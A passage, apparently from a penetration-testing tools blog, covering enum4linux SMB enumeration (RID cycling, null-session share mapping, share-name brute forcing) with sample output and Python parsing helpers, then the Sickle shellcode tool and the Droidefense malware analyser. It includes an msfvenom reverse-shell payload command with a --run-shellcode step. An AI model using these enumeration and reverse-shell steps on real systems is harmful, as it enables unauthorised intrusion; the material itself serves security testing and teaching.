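S-1-5-21-1801674531-1482476501-725345543-502 *unknown*\*unknown* (8)
S-1-5-21-1801674531-1482476501-725345543-513 W2KSQL\None (Domain Group)
"""

# Constructed `lsaquery` answers for a workgroup host and a domain member.
LSAQUERY_WORKGROUP = "Domain Name: WORKGROUP\nDomain Sid: S-0-0\n"
LSAQUERY_DOMAIN = "Domain Name: CORP\nDomain Sid: S-1-5-21-1801674531-1482476501-725345543\n"

# Assumed `lookupnames administrator` answer format (verify against your rpcclient).
LOOKUPNAMES_SAMPLE = "administrator S-1-5-21-1801674531-1482476501-725345543-500 (User: 1)"


def parse_rid_ranges(spec: str) -> List[int]:
    """Expand the -R syntax, e.g. '500-550,1000-1050', into a list of RIDs."""
    rids: List[int] = []
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        if "-" in part:
            lo, hi = part.split("-", 1)
            rids.extend(range(int(lo), int(hi) + 1))
        else:
            rids.append(int(part))
    return rids


def host_is_domain_member(lsaquery_output: str) -> Optional[bool]:
    """The rule from the page: 'Domain Sid: S-0-0' means workgroup, a real SID means domain."""
    m = re.search(r"Domain Sid:\s*(\S+)", lsaquery_output)
    if not m:
        return None
    return m.group(1) != "S-0-0"


def base_sid_from_lookupnames(output: str) -> Optional[str]:
    """Strip the trailing RID from a known user's SID to get the host/domain SID."""
    m = re.search(r"(S-1-5-21-\d+-\d+-\d+)-\d+", output)
    return m.group(1) if m else None


def lookupsids_command(base_sid: str, rids: List[int]) -> str:
    """The rpcclient -c argument that resolves a whole batch of RIDs in one call."""
    return "lookupsids " + " ".join(f"{base_sid}-{rid}" for rid in rids)


def rpcclient_argv(target: str, command: str, user: str = "", password: str = "") -> List[str]:
    """argv for the call enum4linux shows in verbose mode (rpcclient -U''%'' host -c '...');
    the list form leaves no shell quoting to get wrong."""
    return ["rpcclient", "-U", f"{user}%{password}", target, "-c", command]


SID_LINE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)\s+(.+?)\s+\((.+)\)\s*$")


def parse_lookupsids(output: str) -> List[Tuple[int, str, str]]:
    """(rid, name, type) for every resolved SID; unresolved '*unknown*' RIDs are dropped."""
    found = []
    for line in output.splitlines():
        m = SID_LINE.match(line.strip())
        if not m:
            continue
        rid, name, kind = int(m.group(2)), m.group(3), m.group(4)
        if "*unknown*" in name:
            continue
        found.append((rid, name, kind))
    return found


if __name__ == "__main__":
    base = base_sid_from_lookupnames(LOOKUPNAMES_SAMPLE)
    rids = parse_rid_ranges("500-550,1000-1050")
    print(" ".join(rpcclient_argv("192.168.2.55", lookupsids_command(base, rids[:5]))))
    for rid, name, kind in parse_lookupsids(LOOKUPSIDS_SAMPLE):
        print(f"{rid:>5}  {name:<30} {kind}")
```

Batching many SIDs into one lookupsids call is what keeps RID cycling fast; on a target that rate-limits or logs anonymous LSA requests, split the range into smaller batches and expect the 4776/4625-style noise on the other side.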

Getting nbtstat Information
The -n option causes enum4linux to run nmblookup and do some extra parsing on its output to provide human-readable information about the remote host.
$ enum4linux.pl -n 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:21:13 2008

----- Nbtstat Information for 192.168.2.55 -----
Looking up status of 192.168.2.55
W2KSQL        <00> - B  Workstation Service
W2KSQL        <20> - B  File Server Service
WORKGROUP     <00> - B  Domain/Workgroup Name
INet~Services <1c> - B  IIS
WORKGROUP     <1e> - B  Browser Service Elections
W2KSQL        <03> - B  Messenger Service
IS~W2KSQL     <00> - B  IIS
ADMINISTRATOR <03> - B  Messenger Service

MAC Address = 00-0C-29-A4-12-6C

Listing Windows shares
If the server allows it, you can obtain a complete list of shares with the -S option. This uses smbclient under the bonnet which also seems to grab the browse list.
Enum4linux will also attempt to connect to each share with the supplied credentials (null session usually, but you could use -u user -p pass to use something else). It will report whether it could connect to the share and whether it was possible to get a directory listing.
$ enum4linux.pl -S 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:28:28 2008

----- Enumerating Workgroup/Domain on 192.168.2.55 ------
[+] Got domain/workgroup name: WORKGROUP

----- Share Enumeration on 192.168.2.55 -----
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
ADMIN$ Disk Remote Admin
C$ Disk Default share
session request to 192.168.2.55 failed (Called name not present)
session request to 192 failed (Called name not present)

Server Comment
--------- -------
W2KSQL
WEBVULNB
WINORACLE

Workgroup Master
--------- -------
PTT SBS
WORKGROUP WEBVULNB

----- Attempting to map to shares on 192.168.2.55 -----
//192.168.2.55/IPC$ Mapping: OK Listing: DENIED
//192.168.2.55/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.2.55/C$ Mapping: DENIED, Listing: N/A
Some hosts don't let you retrieve a share list. In these situations it is still possible to run a dictionary attack to guess share names. First we demonstrate the -S option failing:
$ enum4linux.pl -S 192.168.2.76
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:54:02 2008

----- Share Enumeration on 192.168.2.76 -----
[E] Can't list shares: NT_STATUS_ACCESS_DENIED

----- Attempting to map to shares on 192.168.2.76 -----
The output below shows the -s option using a dictionary file to guess the names of some shares:
$ enum4linux.pl -s share-list.txt 192.168.2.76
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:54:20 2008

----- Session Check on 192.168.2.76 -----
[+] Server 192.168.2.76 allows sessions using username '', password ''

----- Brute Force Share Enumeration on 192.168.2.76 -----
c$ EXISTS
e$ EXISTS
admin$ EXISTS
ipc$ EXISTS, Allows access using username: '', password: ''
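
A small parser for the two share sections shown above, added here as an example for this page (it is not part of enum4linux). It reads the "Attempting to map to shares" and "Brute Force Share Enumeration" lines and lists the shares that accepted the anonymous session enum4linux tried, which is the finding an administrator reviewing the output would want to act on. The sample text is assembled from the two runs above; the regular expressions assume the v0.8.2 line formats shown there.

```python
"""Parse enum4linux share-mapping output and flag shares reachable
with the credentials enum4linux used (here the null session).

Example code added for this page; not part of enum4linux itself.
SAMPLE_OUTPUT is assembled from the runs shown on the page; the
regular expressions assume the enum4linux v0.8.2 line formats."""
import re

# Constructed from the page's sample runs (null session: username '', password '').
SAMPLE_OUTPUT = """\
----- Attempting to map to shares on 192.168.2.55 -----
//192.168.2.55/IPC$ Mapping: OK Listing: DENIED
//192.168.2.55/ADMIN$ Mapping: DENIED, Listing: N/A
//192.168.2.55/C$ Mapping: DENIED, Listing: N/A
----- Brute Force Share Enumeration on 192.168.2.76 -----
c$ EXISTS
e$ EXISTS
admin$ EXISTS
ipc$ EXISTS, Allows access using username: '', password: ''
"""

# "//host/share Mapping: OK Listing: DENIED" (comma after the mapping result is optional)
MAP_RE = re.compile(
    r"^//(?P<host>[^/]+)/(?P<share>\S+)\s+Mapping:\s*(?P<map>\w+),?\s+Listing:\s*(?P<list>\S+)"
)
# "share EXISTS" optionally followed by the credentials that were accepted
BRUTE_RE = re.compile(
    r"^(?P<share>\S+)\s+EXISTS"
    r"(?P<access>, Allows access using username: '(?P<user>[^']*)', password: '(?P<pw>[^']*)')?$"
)
# Section headers carry the target host for the brute-force lines, which do not repeat it
HEADER_RE = re.compile(r"^----- .* on (?P<host>\S+) -----$")


def parse_share_results(text):
    """Return one dict per share line: host, share, mapping outcome, listing outcome, creds."""
    results = []
    host = None
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            host = h.group("host")
            continue
        m = MAP_RE.match(line)
        if m:
            results.append({"host": m.group("host"), "share": m.group("share"),
                            "mapping": m.group("map"), "listing": m.group("list"),
                            "creds": None})
            continue
        b = BRUTE_RE.match(line)
        if b:
            # The dictionary mode only proves a share exists unless it also reports access.
            accessible = b.group("access") is not None
            results.append({"host": host, "share": b.group("share"),
                            "mapping": "OK" if accessible else "UNKNOWN",
                            "listing": "N/A",
                            "creds": (b.group("user"), b.group("pw")) if accessible else None})
    return results


def null_session_shares(results):
    """UNC paths of shares whose mapping succeeded with the anonymous session."""
    return ["//%s/%s" % (r["host"], r["share"]) for r in results if r["mapping"] == "OK"]


if __name__ == "__main__":
    parsed = parse_share_results(SAMPLE_OUTPUT)
    for path in null_session_shares(parsed):
        print("anonymous session accepted on", path)
```

In the sample only the IPC$ shares accept the anonymous session, which is the usual baseline; any disk share appearing in this list, and especially one with Listing: OK, is the result worth investigating.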

Getting OS information
The -o option gets OS information using smbclient. Certain versions of Windows (e.g. 2003) even return service pack information.
$ enum4linux.pl -o 192.168.2.76
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:55:11 2008

----- OS information on 192.168.2.76 -----
[+] Got OS info for 192.168.2.76 from smbclient: Domain=[PTT] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
[E] Can't get OS info with srvinfo: NT_STATUS_ACCESS_DENIED

Printer information
You can get some information about printers known to the remote device with the -i option. I don’t know why you’d want to do this. I only implemented it because I could.

$ enum4linux.pl -i 192.168.2.69
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:55:32 2008

----- Getting printer info for 192.168.2.69 -----
flags:[0x800000]
name:[\\192.168.2.69\SharedFax]
description:[\\192.168.2.69\SharedFax,Microsoft Shared Fax Driver,]
comment:[]


Sickle is a shellcode development tool

Sickle is a shellcode development tool, created to speed up the various steps needed to create functioning shellcode.
Sickle can aid in the following:
  • Identifying instructions resulting in bad characters
  • Formatting output in various languages (python, perl, javascript, etc.)
  • Accepting shellcode via stdin and formatting it / detecting bad characters
  • Executing shellcode in both Windows and Linux environments
  • Comparing reversed shellcode to the original
  • Disassembling shellcode into assembly language (ARM, x86, etc.)
Dependencies:
  • apt-get install python3-pip
  • pip3 install capstone
Usage:
pip3 install capstone
git clone https://github.com/wetw0rk/Sickle && cd Sickle
chmod +x sickle.py
cp sickle.py /usr/bin/sickle
sickle -h
Example:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=(your IPAddress) LPORT=1 -f raw -o test
sickle -r test --run-shellcode
sickle -r example -b "\xa0a"
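The three checks from the capability list that need no disassembler, written out in plain Python as an added example for this page (this is not Sickle's own code): locating bytes that the target context cannot carry, emitting the buffer as a Python or C literal, and comparing a recovered buffer against the original. SAMPLE is a constructed byte string chosen to contain 0x00 and 0x0a, not a real payload.

```python
"""Bad-character check, source-literal formatting and a byte-level
comparison for a raw byte buffer.

Example code added for this page; it is not Sickle's own code.
SAMPLE is a constructed buffer, not a real payload."""

# Constructed sample: contains 0x00 and 0x0a so the check has something to report.
SAMPLE = bytes([0x31, 0xc0, 0x00, 0x50, 0x0a, 0x90, 0xa0, 0x61])


def find_bad_chars(buf, bad):
    """Return [(offset, value)] for each byte of buf that appears in the bad set.

    The offset is what matters: it identifies which instruction produced
    the byte so that instruction can be rewritten with another encoding."""
    badset = set(bad)
    return [(i, b) for i, b in enumerate(buf) if b in badset]


def format_bytes(buf, lang="python", width=16):
    """Format buf as an escaped string literal, `width` bytes per line."""
    hexes = ["\\x%02x" % b for b in buf]
    chunks = ["".join(hexes[i:i + width]) for i in range(0, len(hexes), width)]
    if lang == "python":
        return 'buf = b""\n' + "\n".join('buf += b"%s"' % c for c in chunks)
    if lang == "c":
        return "unsigned char buf[] =\n" + "\n".join('"%s"' % c for c in chunks) + ";"
    raise ValueError("unsupported language: %s" % lang)


def compare_bytes(original, recovered):
    """Return [(offset, original_byte, recovered_byte)] wherever the two differ.

    A length mismatch is reported as None on the shorter side; a filtered
    byte typically shows up as a run of differences starting at its offset."""
    n = max(len(original), len(recovered))
    diffs = []
    for i in range(n):
        a = original[i] if i < len(original) else None
        b = recovered[i] if i < len(recovered) else None
        if a != b:
            diffs.append((i, a, b))
    return diffs


if __name__ == "__main__":
    for off, val in find_bad_chars(SAMPLE, b"\x00\x0a"):
        print("bad byte 0x%02x at offset %d" % (val, off))
    print(format_bytes(SAMPLE, "c"))
    # Simulate a buffer that lost its NUL byte in transit and show where the drift starts.
    print(compare_bytes(SAMPLE, SAMPLE.replace(b"\x00", b"")))
```

The comparison deliberately reports every offset from the first difference onward rather than trying to realign the buffers: a single dropped byte shifts everything after it, and seeing that run is the quickest way to tell a truncation apart from a single substituted byte.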

Droidefense – Advance Android Malware Analysis Framework

What is Droidefense?
Droidefense (originally named atom: analysis through observation machine) is the codename for an Android apps/malware analysis and reversing tool. It was built with a focus on the security issues and tricks that malware researchers face in their everyday work. In situations where the malware has anti-analysis routines, Droidefense attempts to bypass them in order to reach the code and the 'bad boy' routine. These techniques can include virtual machine detection, emulator detection, self-certificate checking, pipe detection, tracer pid checks, and so on.
Droidefense uses an innovative approach in which the code is viewed rather than decompiled. This gives a global view of the execution workflow of the code with 100% accuracy of the gathered information. From this, Droidefense generates an HTML report of the results for easy understanding.
Dependencies: 
+ Java JDK 1.7 or Higher 
+ Maven
Usage:
git clone https://github.com/droidefense/engine && cd engine
mvn clean package -DskipTests
cd target
java -jar droidefense-cli-1.0-SNAPSHOT.jar -i sample.apk

or
wget https://github.com/droidefense/engine/releases/download/0.1-unstable/droidefense.-0.1-unstable-alpha.zip
unzip droidefense.-0.1-unstable-alpha.zip
java -jar droidefense.-1.0-unstable-alpha.jar -i sample.apk